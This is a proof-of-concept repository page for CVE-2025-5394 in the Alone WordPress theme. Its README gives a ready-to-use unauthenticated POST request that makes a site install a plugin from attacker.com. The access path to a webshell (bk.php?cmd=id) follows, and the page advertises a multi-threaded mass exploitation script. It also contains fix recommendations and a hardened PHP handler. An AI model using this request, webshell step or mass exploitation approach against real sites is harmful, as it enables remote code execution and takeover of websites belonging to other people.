
CVE-2025-5394 PoC — Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation

Source
Associated Vulnerability
Title: Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation (CVE-2025-5394)
Description: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.
Readme
# CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation

🔥 **Vulnerability Summary**  
The WordPress theme **Alone**, in versions <= 7.8.3, is affected by an **unauthenticated arbitrary file upload** vulnerability. The flaw allows **unauthenticated attackers** to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint, resulting in **remote code execution (RCE)** through the deployment of backdoored plugins.

This vulnerability stems from the `beplus_import_pack_install_plugin` function exposed to the public via `wp_ajax_nopriv_` without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.

🔍 **Affected Theme**
- **Theme Name:** Alone – Charity Multipurpose Non-profit WordPress Theme
- **Affected Version:** <= 7.8.3
- **Vulnerability Type:** Unauthenticated Arbitrary File Upload → RCE
- **CVE ID:** CVE-2025-5394
- **CVSS Score:** 9.8 (Critical)
- **Impact:** Full remote code execution (RCE) and full site compromise

🧪 **Exploit Features**
- 🔓 **No authentication required**
- 📦 **Uploads malicious plugin ZIP** directly from remote URL
- 🚀 **Automatically installs and activates** the plugin
- 🐚 **Webshell delivery supported** via embedded PHP in plugin
- ✅ **AJAX endpoint accessible by unauthenticated users:**
  `/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin`

🧠 **Researcher**
- Credit: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)

🚀 **Usage**
1. Prepare a malicious plugin ZIP file hosted on a server you control.
   - Must contain a valid plugin header (`Plugin Name:`) and PHP backdoor (e.g., `bk.php`)
2. Craft the following POST request:

   ```http
   POST /wp-admin/admin-ajax.php HTTP/1.1
   Host: victim.com
   Content-Type: application/x-www-form-urlencoded

   action=beplus_import_pack_install_plugin&
   data[plugin_slug]=hello-dolly&
   data[plugin_source]=https://attacker.com/hello-dolly.zip
   ```

3. If successful, the plugin is installed and activated. Access your shell at:
   ```
   https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
   ```

🧰 **Mass Exploitation Script**
This repository includes a mass exploit tool with:
- Multi-threaded processing
- Automatic HTTPS prefixing (if missing)
- Live logging of successful targets to `result.txt`

See [`mass_beplus_exploit.py`](./mass_beplus_exploit.py) for details.

🛠 **Fix Recommendations**
- Theme authors should remove or secure the `wp_ajax_nopriv_beplus_import_pack_install_plugin` hook.
- Implement authentication/capability checks (e.g., `current_user_can('install_plugins')`).
- Validate and restrict plugin sources.
- Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.
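The hardening the list above calls for, shown as an added illustration and not as the Alone theme's actual code: the weak registration pattern the advisory describes beside a handler that is reachable only by logged-in users, checks the `install_plugins` capability and a nonce, and refuses any plugin source other than a wordpress.org download for the requested slug. The handler name, the nonce action `beplus_import_pack` and the field layout follow the request shown in this README; they are assumptions, not the theme's real identifiers.

```php
<?php
// Illustrative reconstruction; handler names and nonce action are assumed.

// Weak pattern (as described in the advisory): the handler is registered
// for anonymous visitors via wp_ajax_nopriv_ and performs no capability check.
// add_action( 'wp_ajax_nopriv_beplus_import_pack_install_plugin', 'beplus_import_pack_install_plugin' );

// Hardened pattern: no nopriv registration at all, so anonymous requests get
// WordPress's default "0" response instead of reaching the installer.
add_action( 'wp_ajax_beplus_import_pack_install_plugin', 'beplus_import_pack_install_plugin_secure' );

function beplus_import_pack_install_plugin_secure() {
    // 1. Only users allowed to install plugins (administrators by default).
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // 2. CSRF protection: the admin page must send a nonce created with
    //    wp_create_nonce( 'beplus_import_pack' ) in the "nonce" field.
    check_ajax_referer( 'beplus_import_pack', 'nonce' );

    $data   = ( isset( $_POST['data'] ) && is_array( $_POST['data'] ) ) ? $_POST['data'] : array();
    $slug   = isset( $data['plugin_slug'] ) ? sanitize_key( $data['plugin_slug'] ) : '';
    $source = isset( $data['plugin_source'] ) ? esc_url_raw( $data['plugin_source'] ) : '';

    // 3. Never fetch an attacker-chosen URL: accept only
    //    https://downloads.wordpress.org/plugin/<slug>[.<version>].zip
    $host = wp_parse_url( $source, PHP_URL_HOST );
    $path = (string) wp_parse_url( $source, PHP_URL_PATH );
    $ok   = ( '' !== $slug )
         && ( 'https' === wp_parse_url( $source, PHP_URL_SCHEME ) )
         && ( 'downloads.wordpress.org' === $host )
         && preg_match( '#^/plugin/' . preg_quote( $slug, '#' ) . '(\.[0-9.]+)?\.zip$#', $path );
    if ( ! $ok ) {
        wp_send_json_error( 'plugin source not allowed', 400 );
    }

    // 4. Install through the core upgrader (no manual unzip into wp-content/plugins)
    //    and do not auto-activate: activation stays a separate, deliberate admin action.
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $source );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( 'install failed', 500 );
    }
    wp_send_json_success( array( 'slug' => $slug ) );
}
```

With the nopriv hook gone, the POST request shown under Usage yields a `0` body from admin-ajax.php for an unauthenticated client, and a capability-less logged-in user receives the 403 JSON error before any download occurs.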

🔒 **Disclaimer:**  
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.

📚 **Reference:**  
- [Wordfence Advisory – CVE-2025-5394](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/alone/alone-charity-multipurpose-non-profit-wordpress-theme-783-missing-authorization-to-unauthenticated-arbitrary-file-upload-via-plugin-installation)

CVE: CVE-2025-5394  
Researcher: [Thai An](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thai-an-thai-an)
File Snapshot

/data/pocs/81e7fc5ab68936da8e3cd6cbad24c3837188fcf0
├── mass_beplus_exploit.py (1.7K)
└── README.md (3.4K)

0 directories, 2 files